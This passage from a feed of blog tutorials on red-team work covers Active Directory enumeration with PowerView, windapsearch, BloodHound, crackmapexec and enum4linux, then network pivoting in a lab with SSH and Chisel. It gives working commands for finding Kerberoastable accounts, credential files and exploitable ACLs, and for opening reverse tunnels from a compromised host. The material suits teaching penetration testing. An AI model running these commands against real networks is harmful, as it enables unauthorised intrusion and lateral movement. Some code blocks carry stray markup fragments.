This query effectively scans through user accounts, focusing on service principal names. It filters out those containing &apos;SQL&apos;, providing a concise list of relevant targets. This level of detailed querying is a testament to BloodHound&apos;s adaptability and depth, allowing you to tailor your investigation to your specific needs.

![](/content/images/2023/10/image-71.png)

Query to show accounts vulnerable to Kerberoast and containing &quot;SQL&quot;.

Cypher&apos;s syntax may be relatively straightforward, but it unlocks a world of possibilities when exploring Active Directory data. For those who wish to delve deeper, a comprehensive list of queries can be found in the BloodHound Cypher Cheatsheet. This resource is invaluable for both newcomers and seasoned professionals.

BloodHound utilizes Neo4j, a graph database, for its data structuring, and Cypher serves as the language for querying this complex information. Cypher might seem a bit intricate at first – it&apos;s almost akin to crafting with ASCII art – but its potential for revealing critical insights in your data is immense.

The Cheatsheet provided at [BloodHound Cypher Cheatsheet](https://hausec.com/2019/09/09/bloodhound-cypher-cheatsheet/) is more than just a guide; it&apos;s a treasure trove of queries. It covers a wide range of scenarios and objectives, providing tailored queries for specific data extractions and insights. This resource is an essential tool for anyone looking to maximize their use of BloodHound, offering guidance and inspiration for diverse and effective data analysis

# Mastering Manual Techniques: A Guide to In-Depth Active Directory Enumeration

Manual enumeration is a critical skill for Red teams aiming for stealth and minimal digital footprint. This process involves meticulously gathering information without triggering alarms. PowerView and evil-winrm are key tools in this task, allowing for in-depth exploration of Active Directory environments.

Another pivotal element in manual enumeration is LDAP (Lightweight Directory Access Protocol). It&apos;s an efficient way to remotely query the domain database (NTDS) for valuable data on users, groups, and computers within a domain. For this purpose, windapsearch is an invaluable utility, offering a streamlined approach to LDAP queries.

[GitHub - ropnop/go-windapsearch: Utility to enumerate users, groups and computers from a Windows domain through LDAP queries](https://github.com/ropnop/go-windapsearch)

It&apos;s important to remember that these tools are just examples of what&apos;s available for domain enumeration. The cyber security landscape is rich with alternatives like enum4linux and crackmapexec, each offering unique features and approaches. It&apos;s worthwhile to experiment with these tools and discover which ones align best with your needs and preferences.

In manual enumeration, asking the right questions is as important as the tools you use. A well-structured approach, as outlined in the provided diagram, guides you through a thorough and effective enumeration process. It&apos;s about piecing together the puzzle of a domain&apos;s structure and vulnerabilities, one detail at a time.

![](/content/images/2023/10/image-82.png)

Diagram of questions we should answer from the domain

## Effective Domain Management: Utilizing Evil-WinRM for Advanced Active Directory Enumeration

Evil-winrm, a potent tool in the arsenal of penetration testers, serves as a gateway to Windows Remote Management (WinRM). As explored in our previous discussions, particularly in [chapter 5](https://www.kayssel.com/post/active-directory-5/), this tool&apos;s effectiveness in script execution is unparalleled.

To initiate, use the command: `evil-winrm --ip &lt;target-ip&gt; -u &lt;user&gt; -p &lt;password&gt; -s &lt;scripts_directory&gt;`. This launches a shell where specific scripts can be invoked, embedding their functions into the session&apos;s memory. It&apos;s a seamless process that amplifies your capabilities within the target environment.

![](/content/images/2023/10/image-28.png)

Running winrm with powerview

This article expands beyond our prior discussions, diving into the enumeration of Group Policy Objects (GPOs), Organizational Units (OUs), and Access Control Lists (ACLs). These elements, crucial in understanding the intricacies of Active Directory environments, were not covered in earlier articles. By integrating these concepts here, we aim to enrich your comprehension and operational capacity in these domains.

## Unraveling the Domain Structure: Key Insights for Targeted Exploration

Diving into the domain structure is a crucial first step once we&apos;ve established a shell in our target environment. Understanding the domain&apos;s hierarchy, including its possible placement within a forest or its relationship with parent domains, lays the foundation for deeper exploration. This knowledge is pivotal in plotting a path for privilege escalation or identifying potential vulnerabilities.

To extract domain information, the `Get-NetDomain` function serves as our primary tool. This function reveals critical details about the domain&apos;s structure and attributes.

![](/content/images/2023/10/image-29.png)

Domain information

Equally important is capturing the domain&apos;s Security Identifier (SID) using `Get-DomainSID`. The SID, a unique identifier, plays a vital role in various advanced techniques, such as forging Golden Tickets, which can grant extensive access within the domain.

![](/content/images/2023/10/image-30.png)

Domain SID

For a broader perspective, LDAP (Lightweight Directory Access Protocol) proves invaluable. Using `windapsearch` with the metadata module, we can obtain a comprehensive overview of the domain:

```bash
windapsearch --dc 192.168.253.129 -u beruinsect@shadow.local -p Password1 -m metadata

```

![](/content/images/2023/10/image-75.png)

Domain Metadata

This command allows us to delve into the domain&apos;s metadata, offering insights that might be overlooked by standard enumeration tools. Further, the flexibility of `windapsearch` is evident in its ability to filter results based on specific attributes, enhancing the efficiency and focus of our enumeration efforts.

![](/content/images/2023/10/image-79.png)

Module help

![](/content/images/2023/10/image-80.png)

Use of &quot;attrs&quot;

## Exploring Security Policies with PowerView

The password policy in an Active Directory domain is a critical aspect of security, and PowerView offers an efficient way to examine these policies. It&apos;s particularly useful when considering brute force attacks, as a robust password policy can be a significant barrier against such attempts. With PowerView, we can gain detailed insights into these policies using the command:

```powershell
(Get-DomainPolicy).&quot;SystemAccess&quot;
```

![](/content/images/2023/10/image-83.png)

Moreover, PowerView enables us to access the configuration of Kerberos tickets, a key element in managing authentication in Active Directory. Understanding Kerberos configuration is essential as it can reveal vulnerabilities or key security practices. To check this configuration, we use:

```powershell
 (Get-DomainPolicy).&quot;kerberospolicy&quot;
```

![](/content/images/2023/10/image-31.png)

Kerberos policy

## Uncovering Domain Controller Details with PowerView

In the realm of Active Directory, Domain Controllers play a pivotal role, and understanding their configuration is vital. PowerView offers a simple yet effective means to retrieve detailed information about these controllers. Crucial details such as the operating system version are particularly important as older versions might be susceptible to well-known vulnerabilities like EternalBlue. This information can be obtained using the command:

```powershell
 Get-DomainController 
```

![](/content/images/2023/10/image-32.png)

Obtain domain controller information

For environments with numerous domain controllers, where a concise overview is needed, PowerView allows us to streamline the output. By using the command below, we can focus on just the names of the controllers, providing a clear and succinct view:

```powershell
Get-DomainController | select name
```

![](/content/images/2023/10/image-33.png)

Filter for viewing domain controllers

## Navigating Domain User Enumeration with PowerView and Windapsearch

Enumerating domain users is a critical step in understanding the landscape of an Active Directory environment. PowerView simplifies this process, offering commands that enable detailed insights into user accounts. The command `Get-DomainUser` can be employed to list all domain users, and for a more tailored output, the following command can be used:

```powershell
&lt;details&gt;
&lt;summary&gt;Get-DomainUser &lt;/summary&gt;

```

![](/content/images/2023/10/image-34.png)

Get Domain users

```powershell
&lt;/details&gt;

Get-DomainUser | select cn,distinguishedname
```

![](/content/images/2023/10/image-36.png)

Filter user information

For an in-depth view of specific users, PowerView allows us to extract various properties such as creation dates, security identifiers (SIDs), and password policies:

```powershell
Get-DomainUser -Identity &lt;username&gt;
```

![](/content/images/2023/10/image-37.png)

&lt;details&gt;
&lt;summary&gt;Filter by a a specific user&lt;/summary&gt;

```powershell
Get-DomainUser -Identity &lt;username&gt; -Properties DisplayName, MemberOf,objectsid,useraccountcontrol | Format-List
```
&lt;/details&gt;


![](/content/images/2023/10/image-38.png)

Filter information of interest

Windapsearch complements these PowerShell functionalities by enabling remote LDAP enumeration of domain users:

```bash
windapsearch --dc 192.168.253.129 -u beruinsect@shadow.local -p Password1 -m users

```

![](/content/images/2023/10/image-73.png)

Obtaining all users

Moreover, Windapsearch is invaluable for identifying user accounts susceptible to Kerberoasting attacks:

```bash
windapsearch --dc 192.168.253.129 -u beruinsect@shadow.local -p Password1 -m 

```

![](/content/images/2023/10/image-74.png)

Obtaining users with service accounts

## Exploring Domain Computers: PowerView and LDAP Approaches

Unveiling the landscape of domain computers is a crucial step in Active Directory enumeration. PowerView provides the means to not only list these computers but also delve into their operating systems, revealing potential vulnerabilities:

&lt;details&gt;
&lt;summary&gt;To list the computers visually:&lt;/summary&gt;

```powershell
Get-NetComputer| select name
```
&lt;/details&gt;


![](/content/images/2023/10/image-39.png)

Filter computers

To identify computers running specific versions of Windows, such as Server 2016, PowerView offers a detailed command:

```powershell
Get-NetComputer -OperatingSystem &quot;*Server 2016*&quot; | select name ,operatingsystem |Format-List
```

![](/content/images/2023/10/image-40.png)

Filter by operating system

Complementing PowerView&apos;s capabilities, LDAP queries through Windapsearch enable enumeration of domain computers, providing an alternative approach:

```bash
windapsearch --dc 192.168.253.129 -u beruinsect@shadow.local -p Password1 -m computers

```

![](/content/images/2023/10/image-72.png)

Getting machines from LDAP

## Mastering Group Enumeration

Exploring group dynamics within Active Directory is pivotal for understanding privilege escalation avenues. In upcoming chapters, we&apos;ll dive deeper into the intricacies of critical groups. For now, let&apos;s focus on how to enumerate them effectively using PowerView and Windapsearch.

&lt;details&gt;
&lt;summary&gt;To get a comprehensive list of all available groups with PowerView:&lt;/summary&gt;

```powershell
Get-NetGroup | select name
```
&lt;/details&gt;


![](/content/images/2023/10/image-41.png)

List domain groups

For specifics about a particular group, such as &apos;Domain Admins&apos;:

```powershell
Get-NetGroup &apos;Domain Admins&apos;
```

![](/content/images/2023/10/image-42.png)

Filter by group

Using a wildcard, we can filter groups containing the term &apos;admin&apos;:

```powershell
 Get-NetGroup &quot;*admin*&quot;| select name 
```

![](/content/images/2023/10/image-43.png)

Filter by groups with the word admin

To uncover all members of a specific group like &apos;Domain Admins&apos;:

```powershell
Get-NetGroupMember -MemberName &quot;domain admins&quot; -Recurse | select MemberName
```

![](/content/images/2023/10/image-44.png)

Filter by users who are administrators

&lt;details&gt;
&lt;summary&gt;To list all groups within the domain:&lt;/summary&gt;

```bash
windapsearch --dc 192.168.253.129 -u beruinsect@shadow.local -p Password1 -m groups

```
&lt;/details&gt;


![](/content/images/2023/10/image-76.png)

Obtaining groups through windapsearch

For a targeted approach to uncover members within the &apos;Domain Admins&apos; group:

```bash
windapsearch --dc 192.168.253.129 -u beruinsect@shadow.local -p Password1 -m members --group &quot;CN=Domain Admins,OU=Groups,DC=SHADOW,DC=local&quot;

```

![](/content/images/2023/10/image-78.png)

Filter by members of a specific group

## Deciphering Local Group Dynamics in Windows Environments

Delving into the local group structure of Windows machines is a critical step in understanding the security and user management of a system. Here&apos;s how we can methodically enumerate and analyze local groups and their members:

**Listing Local Groups:** To get an overview of all local groups present on a Windows machine, use the following PowerView command:

```powershell
Get-NetLocalGroup | Select-Object GroupName
```

![](/content/images/2023/10/image-45.png)

List local groups

**Examining Group Members:** To understand who belongs to a specific group, such as &apos;Administrators&apos;, use:

```powershell
Get-NetLocalGroupMember -GroupName Administrators | Select-Object MemberName, IsGroup, IsDomain
```

This command provides insights into whether the members are users or groups and if they belong to the domain.

![](/content/images/2023/10/image-46.png)

Members of a group

**Investigating User&apos;s Group Affiliations:** To explore the groups a specific user is part of, use:

```powershell
Get-NetGroup -UserName &lt;&quot;username&quot;&gt;| select name
```

![](/content/images/2023/10/image-47.png)

Local groups of a specific user

## Uncovering Shared Network Resources: A Dive into NetShares

Exploring shared network folders is akin to uncovering hidden treasures within a network. These shares often contain sensitive information, crucial backups, and sometimes even forgotten data, ripe for examination. To embark on this exploration in Windows environments, we utilize a powerful tool in our arsenal:

**Identifying Shared Folders:** To list all shared network resources on a Windows machine, the following PowerView command becomes our key:

```powershell
&lt;details&gt;
&lt;summary&gt;Get-NetShare&lt;/summary&gt;

```

This command reveals all shared folders, providing a map to potentially valuable or sensitive resources within the network landscape.

![](/content/images/2023/10/image-49.png)

List of shared network folders on the machine

## Sifting Through Files: The Hunt for Compromising Data

In the pursuit of critical information within a network, diving into the sea of files is essential. Among these files, some contain the keys to further access or pivotal data that could lead to compromising other machines. To embark on this digital treasure hunt, a powerful PowerShell script becomes our compass. Run this script in the `C:\Users` directory to unearth files of various formats that may hold valuable secrets:

```powershell
&lt;/details&gt;

 Get-ChildItem -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx,*.kdbx,*.ini,*.log,*.xml,*.git* -File -Recurse -ErrorAction SilentlyContinue -Exclude desktop.ini 

```

This script meticulously scans for a wide array of file types, from text documents to logs, uncovering potential repositories of sensitive information. It&apos;s a methodical approach to sift through the digital layers, searching for those hidden gems – be it credentials, configuration files, or even inadvertently stored sensitive data. With each discovered file, we inch closer to understanding the network&apos;s secrets and vulnerabilities.

## Navigating Group Policies: A Key to Privilege Escalation

In the intricate maze of Active Directory, Group Policy Objects (GPOs) stand out as crucial elements for lateral movement and privilege escalation. Essentially, GPOs are collections of policy settings that orchestrate the behavior and access rights of users and computers within a Windows network. While we will delve deeper into their significance in upcoming chapters, it&apos;s pivotal to grasp how to unearth these policy gems.

For starters, utilize PowerView&apos;s capabilities to list GPOs with the following commands:

-   `Get-NetGPO` to list all GPOs.
-   `Get-NetGPO | select displayname` for a focused view of GPO names.
-   `Find-GPOComputerAdmin –Computername &lt;ComputerName&gt;` to pinpoint admin GPOs for specific computers.

![](/content/images/2023/10/image-50.png)

List all domain GPOs

![](/content/images/2023/10/image-51.png)

Filter by name

![](/content/images/2023/10/image-52.png)

GPOs of a specific machine

Furthermore, to expand your search across the domain&apos;s landscape, employ `windapsearch` with its `gpos` module:

```bash
windapsearch --dc 192.168.253.129 -u beruinsect@shadow.local -p Password1 -m gpos

```

![](/content/images/2023/10/image-77.png)

## Unraveling Organizational Units: The Blueprint of Active Directory Structure

Picture Organizational Units (OUs) as the intricate compartments of a grand library within the Active Directory (AD) domain. These OUs serve as logical containers in Windows operating systems, methodically organizing and managing various network objects. Imagine them as shelves holding books (users), folders (groups), and gadgets (computers), each classified and arranged for optimal management and access.

Administrators typically harness OUs to implement a structured, hierarchical order in the AD landscape. This structure is not just for orderliness; it&apos;s a strategic tool for applying targeted security policies to specific clusters of network objects. Just as a librarian categorizes books for easy access and to maintain a certain order, administrators use OUs to control and streamline the network environment.

To take a peek into this well-ordered world of OUs, the command `Get-NetOU` is your key. It&apos;s like having a map that guides you through the various sections of this vast library, providing insights into how the AD domain is segmented and governed. In upcoming discussions, we&apos;ll delve deeper into the interplay between OUs and Group Policy Objects (GPOs), unraveling how they collectively sculpt the security and operational framework of the AD domain.

![](/content/images/2023/10/image-53.png)

Obtaining OUs

## Deciphering ACLs: The Gatekeepers of Network Security

Access Control Lists (ACLs) are akin to the intricate security protocols of a high-tech facility. They are sets of rules integral to managing access rights in operating systems, file systems, and network environments. ACLs dictate who gets to access, modify, delete, or perform specific actions on a resource, much like a security guard determines who enters a building.

In the realm of Active Directory (AD), understanding and managing ACLs are crucial for maintaining robust network security. PowerView, a versatile tool in our arsenal, allows us to inspect ACLs associated with different groups. For example, using `Get-ObjectAcl -SamAccountName &quot;&lt;group&gt;&quot; -ResolveGUIDs`, we can unveil the list of ACLs tied to a particular group, uncovering the security permissions vested in it.

![](/content/images/2023/10/image-54.png)

ACLs of a given group

Moreover, determining whether a user can alter a group policy becomes straightforward with `Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name}`. This capability is vital in auditing and securing group policy settings.

![](/content/images/2023/10/image-55.png)

See if we can modify a group policy

To dig deeper and find ACLs of particular interest or potential vulnerabilities, `Invoke-ACLScanner -ResolveGUIDs` is our go-to command. It scans and highlights ACLs that might be exploitable for privilege escalation or unauthorized access.

![](/content/images/2023/10/image-56.png)

Finding interesting ACLs

Investigating ACLs linked to a specific user is also a breeze with `Get-DomainObjectAcl -Identity &lt;user&gt; -ResolveGUIDs`. This function is particularly useful when assessing the access rights and permissions of a user within the AD environment.

![](/content/images/2023/10/image-57.png)

Obtain access control lists for a given usero

Lastly, to inspect ACLs applied to a specific folder or file, `Get-PathAcl -Path &quot;\\10.0.0.2\Users&quot;` comes in handy. This helps in understanding the access control set on shared network folders or sensitive files, a crucial aspect of data security.

![](/content/images/2023/10/image-58.png)

Access control lists against a given path

# Navigating the Maze of Active Directory: A Comprehensive Wrap-Up

In this explorative journey, we&apos;ve delved deep into the intricacies of Active Directory enumeration, both through automated means like BloodHound and manual methods utilizing tools like PowerView and windapsearch. We&apos;ve seen how BloodHound, with its graph theory prowess, serves as a compass, guiding us through the complex labyrinth of privilege relationships and revealing paths to escalate our privileges within the domain.

Simultaneously, we embraced the subtler art of manual enumeration, vital in scenarios demanding stealth, using tools like PowerView and windapsearch. This method, though more labor-intensive, equips us with the finesse to operate undetected, a crucial skill in red team operations.

Our exploration didn&apos;t just stop at gathering information; we learned to interpret and utilize it. From scrutinizing domain controllers and user accounts to dissecting groups, policies, and ACLs, we gained insights into the myriad ways each component of an Active Directory environment interacts and influences the other.

As we navigated through this complex network of information and permissions, we uncovered various facets of domain security, from GPOs and OUs to the finer details of local group enumerations and network shares. Each element we encountered and understood brought us closer to mastering the domain environment, teaching us not just how to extract information but also how to use it effectively.

In essence, this chapter has been a comprehensive guide, empowering us with the knowledge and tools to perform thorough and effective Active Directory enumerations. Whether you&apos;re a budding cybersecurity enthusiast or a seasoned professional, the insights and techniques covered here are invaluable assets in your quest to understand and secure Active Directory environments.

# Tips of the article


&lt;details&gt;
&lt;summary&gt;We have given enumeration with powerview and windapsearch, however, how can we enumerate domain users with crackmapex and enum4linux ?&lt;/summary&gt;

```bash
crackmapexec smb targets.txt -u &lt;user&gt; -p &lt;pass&gt; --users

```

![](/content/images/2023/10/image-84.png)

```bash
enum4linux -u &lt;user&gt; -p &lt;password&gt; -U &lt;ip&gt;

```

![](/content/images/2023/10/image-85.png)
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;Following the above, how can I list the network shared folders ? and the password policy ?&lt;/summary&gt;

&lt;details&gt;
&lt;summary&gt;To list shares:&lt;/summary&gt;

```bash
crackmapexec smb &lt;targets&gt; -u &lt;user&gt; -p &lt;password&gt; --shares

```
&lt;/details&gt;


![](/content/images/2023/10/image-89.png)

```bash
enum4linux -u &lt;user&gt; -p &lt;password&gt; -S &lt;ip&gt;

```

![](/content/images/2023/10/image-86.png)

&lt;details&gt;
&lt;summary&gt;To enumerate the password policy:&lt;/summary&gt;

```bash
crackmapexec smb &lt;targets&gt; -u &lt;user&gt; -p &lt;pass&gt; --pass-pol
```
&lt;/details&gt;


![](/content/images/2023/10/image-88.png)

```bash
enum4linux -u &lt;user&gt; -p &lt;password&gt; -P &lt;ip&gt;

```

![](/content/images/2023/10/image-87.png)
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;What can i use bloodhound for and when should i not use it ?&lt;/summary&gt;

I can use it when I&apos;m doing internal infrastructure pentesting or ctf as the noise it generates is not really crucial. However, in an exercise where I have to be quiet, I will have to avoid it, otherwise I will be detected quickly.
&lt;/details&gt;

# Resources

[Active Directory Domain Enumeration Part-1 With Powerview](https://nored0x.github.io/red-teaming/active-directory-domain-enumeration-part-1/)

[Active Directory Enumeration - Pentest Everything](https://viperone.gitbook.io/pentest-everything/everything/everything-active-directory/ad-enumeration)

[GitHub - S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet: A cheat sheet that contains common enumeration and attack methods for Windows Active Directory.](https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet)</content:encoded><author>Ruben Santos</author></item><item><title>Mastering Active Directory Pivoting: Advanced Techniques and Tools</title><link>https://www.kayssel.com/post/pivoting-1</link><guid isPermaLink="true">https://www.kayssel.com/post/pivoting-1</guid><description>In this chapter, we explore advanced network pivoting techniques, using tools like Chisel and SSH in a lab setup. We focus on local and remote port forwarding and dynamic port forwarding for practical cybersecurity skills development.</description><pubDate>Sun, 08 Oct 2023 07:35:23 GMT</pubDate><content:encoded># **Welcoming the World of Advanced Network Pivoting**

Hello and welcome to this exciting chapter in our ongoing series dedicated to the fascinating realm of Active Directory! Today, we delve into a crucial aspect of network security and penetration testing: the art of pivoting. But before we dive in, let&apos;s pause for a moment: What exactly is pivoting?

Pivoting is the strategic technique used in cybersecurity to move through a network, leveraging compromised systems as stepping stones to access other parts of the network that were previously unreachable. It&apos;s a critical skill in enterprise environments, where complex network architectures and multiple subnets create both challenges and opportunities for cybersecurity professionals.

In this chapter, we&apos;ll not only discuss the theoretical aspects of pivoting but also put these concepts into practice through a specially curated laboratory setup. This hands-on approach is designed to give you a practical understanding of different pivoting techniques and tools, combining theory with real-world application.

Whether you&apos;re a seasoned security expert or just beginning your journey in cybersecurity, this chapter promises to enrich your skill set with practical knowledge and techniques. From setting up your lab environment to mastering tools like Chisel and exploring SSH and WINRM capabilities, we&apos;ve got you covered.

So, buckle up and prepare to embark on a journey that will take you through the depths of network pivoting, equipping you with the knowledge and skills to navigate and secure complex network environments. Let&apos;s get started on this thrilling adventure into the world of network pivoting!

# Chisel: A Pivoting Powerhouse in Penetration Testing

Chisel, developed with Golang, is a versatile tool that simplifies the process of pivoting during penetration testing. It&apos;s uniquely designed as a fast TCP/UDP tunnel, transported over HTTP and secured via SSH, combining both client and server functionalities in a single executable. This makes it ideal for efficient tunneling of both TCP and UDP traffic through HTTP.

To get started with Chisel, just download the appropriate binary for Windows or Linux from their GitHub releases page. Its dual client-server model positions it as a pivotal tool (pun intended!) in your cybersecurity arsenal. I&apos;ll soon showcase some practical examples demonstrating Chisel&apos;s prowess in pivoting scenarios. Stay tuned for more insights on leveraging this powerful tool!

[Releases · jpillora/chisel](https://github.com/jpillora/chisel/releases)

# Lab Preparation for Pivoting Techniques

Setting up an effective lab environment is crucial for practicing and mastering pivoting techniques in cybersecurity. My recommendation is to start with a well-structured lab, as outlined in the first three chapters of the lab configuration series I&apos;ve provided. Particularly, chapter 3 delves into the specifics of configuring a lab for pivoting exercises.

[Offensive security lab 3. Lab with subnets, firewall and pivot ready](https://www.kayssel.com/post/lab-3/)

![](/content/images/2023/10/image-9.png)

Lab setup

Here&apos;s a high-level overview of the lab setup I&apos;ll be using to demonstrate pivoting:

-   **Kali Linux Machine**: Positioned within the same subnet as the Active Directory domain (192.168.253.0/24), yet outside the internal network. This strategic placement is key for executing pivoting techniques.
-   **Compromised Machine (192.168.253.130)**: We&apos;ll utilize this machine, which we&apos;ve managed to compromise, as a launchpad to access services on another target machine (192.168.254.131). Notably, the &quot;Beru Internal&quot; machine at 192.168.254.131 hosts several services, including a vulnerable web page on port 3000 (JuiceShop).
-   **Enabling SSH and WINRM**: For seamless implementation of pivoting techniques, ensure that SSH and WINRM are enabled on the machine you intend to pivot through. Use the following PowerShell command to enable WINRM:

```powershell
&lt;details&gt;
&lt;summary&gt;Enable-PSRemoting -SkipNetworkProfileCheck -Force&lt;/summary&gt;

```

![](/content/images/2023/09/image-30.png)

Enable WINRM

For SSH on Windows machines, follow these steps:

-   Search and open &quot;Settings&quot;.
-   Navigate to &quot;Apps &gt; Apps &amp; features &gt; Optional features&quot;.
-   Click &quot;Add a feature&quot;, find &quot;OpenSSH server&quot;, expand the option, and install it.
-   Finally, activate the SSH server through &quot;Services&quot;.

![](/content/images/2023/09/image-36.png)

Install SSH server

![](/content/images/2023/10/image-10.png)

SSH service

![](/content/images/2023/09/image-38.png)

Start service

By carefully setting up your lab environment as described, you&apos;ll create an ideal testing ground for practicing a range of pivoting techniques, using tools like SSH and Chisel. This setup will not only enhance your understanding of pivoting but also prepare you for more advanced cybersecurity practices.

# Exploring Pivoting Techniques: Local Port Forwarding

Pivoting is a crucial skill in cybersecurity, enabling you to move stealthily within a network. One effective technique is Local Port Forwarding, which involves redirecting traffic from your machine to a specific port on a remote system. Let&apos;s delve into this with practical examples.

## Local Port Forwarding with SSH

![](/content/images/2023/10/image-11.png)

Local port forwarding example

Suppose we&apos;ve gained SSH access to a machine (192.168.253.130) and want to reach a service on another machine (192.168.254.131) at port 3000. We can set up a local port forwarding using SSH with the following command:

```bash
&lt;/details&gt;

ssh -L &lt;port to be opened on the Kali machine&gt;:&lt;remote machine to be accessed&gt;:&lt;remote port&gt; &lt;user&gt;@&lt;compromised machine&gt;

```

![](/content/images/2023/10/image-5.png)

Local port forwarding with ssh

For instance, to access the service on port 3000 via port 9000 on your machine, you&apos;d use:

![](/content/images/2023/10/image-4.png)

Access to JuiceShop with local port forwarding

Once set up, you can access the service through `localhost:9000` on your browser.

## Local Port Forwarding with Chisel

Chisel, a more versatile tool, also allows local port forwarding but requires initial setup. First, upload the Chisel binary to the compromised machine, possibly using WINRM. Then set up Chisel in a client-server model.

![](/content/images/2023/10/image-12.png)

Chisel upload via winrm

![](/content/images/2023/10/image-13.png)

Local port forwarding with chisel

**Create a Chisel Server**: On the compromised machine, initiate a Chisel server to listen on a specific port (e.g., 1234).

```powershell
.\chisel_windows.exe server -p 1234

```

![](/content/images/2023/10/image-14.png)

Chisel server on the machine for pivoting

&lt;details&gt;
&lt;summary&gt;Verify the server setup with:&lt;/summary&gt;

```bash
netstat -ano | select-sgring 1234

```
&lt;/details&gt;


![](/content/images/2023/10/image-2.png)

Verification of the open port

**Set Up Chisel Client on Your Machine**: Connect your machine to the Chisel server, specifying local port forwarding rules.

```bash
./chisel_linux client [ServerIP]:1234 R:9000:192.168.254.131:3000
```

![](/content/images/2023/10/image.png)

Execution of the client

&lt;details&gt;
&lt;summary&gt;Check the port opening on your machine:&lt;/summary&gt;

```bash
netstat -tupln

```
&lt;/details&gt;


![](/content/images/2023/10/image-3.png)

Check of the open port in kalicheck of the open port in kali

**Access the Service**: Open your browser and navigate to `localhost:9000` to access the remote service.

![](/content/images/2023/10/image-4.png)

Access to the service via chisel

# Navigating Networks with Remote Port Forwarding

Remote port forwarding is a pivotal technique in cybersecurity, allowing you to circumvent firewall restrictions and access remote services. Unlike local port forwarding, this method sets up a tunnel from the server (victim machine) to the client (your machine).

## Remote Port Forwarding via SSH

![](/content/images/2023/10/image-15.png)

Remote Port Forwarding diagram

Suppose you want to access a service on a remote machine through your local port. SSH provides a straightforward way to set this up:

```bash
ssh -R [LocalPort]:[TargetMachineIP]:[TargetPort] [Username]@[YourMachine]
```

For instance, if you want to access a service on port 3000 of a target machine via port 8000 on your local machine, the command would be:

```bash
ssh -R 8000:192.168.254.131:3000 user@yourlocalmachine
```

![](/content/images/2023/09/image-35.png)

Remote port forwarding with ssh

This setup is particularly useful for bypassing firewall restrictions that might block direct access to the target service.

## Remote Port Forwarding with Chisel

Chisel offers a more dynamic approach to remote port forwarding. In this scenario, you set up a Chisel server on your local machine (Kali Linux) and a client on the victim machine.

![](/content/images/2023/10/image-17.png)

Remote Port Forwarding diagram

**Create a Chisel Server on Your Machine**: This server will listen for connections from the victim machine.

```bash
chisel_linux server -p [ChiselServerPort] --reverse
```

For example, to start a server on port 1234:

```bash
chisel_linux server -p 1234 --reverse
```

![](/content/images/2023/09/image-34.png)

Example of remote port forwarding with chisel

**Launch Chisel Client on the Victim Machine**: This client connects to your Chisel server and sets up the tunnel.

```bash
chisel_windows.exe client [YourMachineIP]:[ChiselServerPort] R:[LocalPort]:[TargetMachineIP]:[TargetPort]
```

&lt;details&gt;
&lt;summary&gt;For instance:&lt;/summary&gt;

```bash
chisel_windows.exe client yourmachineip:1234 R:8000:192.168.254.131:3000
```
&lt;/details&gt;


**Access the Target Service**: Once the tunnel is established, you can access the target service on your local port (8000 in this case).

![](/content/images/2023/09/image-33.png)

Service access

# Harnessing Dynamic Port Forwarding for Network Flexibility

Dynamic port forwarding is a versatile technique in cybersecurity, enabling access to multiple network services simultaneously without specifying each one. It&apos;s especially valuable for accessing various services within a network segment that was previously unreachable.

## Local Dynamic Port Forwarding with SSH

![](/content/images/2023/10/image-19.png)

Local dynamic port forwarding diagram

Local dynamic port forwarding establishes a SOCKS proxy server on a specified local port, allowing applications to redirect their network traffic through this proxy. This proxy can facilitate connections from a compromised entry point to other inaccessible systems or segments.

**Create a SOCKS Proxy Server**:

```bash
ssh -D 1080 [Username]@[PivotingMachineIP]
```

![](/content/images/2023/10/image-6.png)

Local dynamic port forwarding with ssh

**Configure Proxychains**: Modify `/etc/proxychains4.conf` to tunnel traffic from port 1080.

```bash
sudo nvim /etc/proxychains4.conf

```

Uncomment the necessary lines to activate the SOCKS proxy.

![](/content/images/2023/10/image-20.png)

Proxychains configuation

**Accessing Services**: With Proxychains configured, you can use it to access various services:

&lt;details&gt;
&lt;summary&gt;Access an HTTP service:&lt;/summary&gt;

```bash
proxychains firefox 

```
&lt;/details&gt;


![](/content/images/2023/09/image-40.png)

Access to JuiceShop

Access SSH service on internal machines.

![](/content/images/2023/10/image-22.png)

Ssh access from internal machine

To access services on the pivoting machine, refer to `127.0.0.1`.

![](/content/images/2023/10/image-23.png)

Access to SMB shared folders

**Enumerating Ports with Nmap**: Nmap can be used with Proxychains to enumerate TCP ports on remote machines. For internal machines, a faster option is to use [Naabu](https://github.com/projectdiscovery/naabu), a port scanning tool.

![](/content/images/2023/10/image-24.png)

Use of Nmap using proxychains

![](/content/images/2023/10/image-25.png)

Using naabu to enumerate ports

## Local Dynamic Port Forwarding with Chisel

Chisel offers another method for local dynamic port forwarding, requiring a server on the pivot machine and a client on your machine.

![](/content/images/2023/10/image-26.png)

Chisel to local dynamic port forwarding

**Setting up Chisel Server**:

```bash
chisel_windows.exe server -p [ChiselServerPort] --socks5
```

Start the server on the pivot machine.

![](/content/images/2023/10/image-8.png)

Chisel server

**Activating Chisel Client**:

```bash
chisel_linux client [PivotMachineIP]:[ChiselServerPort] [LocalSOCKSPort]:socks
```

![](/content/images/2023/10/image-7.png)

Chisel client

**Using Proxychains with Chisel**: Once Chisel is set up, Proxychains can be used similarly to SSH to access services on the internal network.

# Remote Dynamic Port Forwarding with Chisel

![](/content/images/2023/10/image-27.png)

Remote dynamic port forwarding with chisel

Remote dynamic port forwarding is a pivotal technique in network pivoting, particularly useful when dealing with Windows machines that require administrator permissions for local port forwarding. Chisel, a versatile tool for creating secure network tunnels, is often the go-to choice for this task.

**Server Setup on Kali Machine**:

-   Run Chisel in server mode with the `--reverse` flag to allow reverse connections from the client.
-   The server listens on a specified port (e.g., 1234).
-   Command:

```bash
chisel_linux server -p 1234 -reverse
```

**Client Configuration on Target Machine**:

-   The client connects to the server and specifies the local port for the SOCKS proxy.
-   Command:

```bash
chisel_windows.exe client &lt;ServerIP&gt;:1234 R:&lt;LocalSOCKSPort&gt;:socks
```

![](/content/images/2023/10/image-21.png)

Example of commands

# **Concluding Thoughts: Mastering the Art of Network Pivoting**

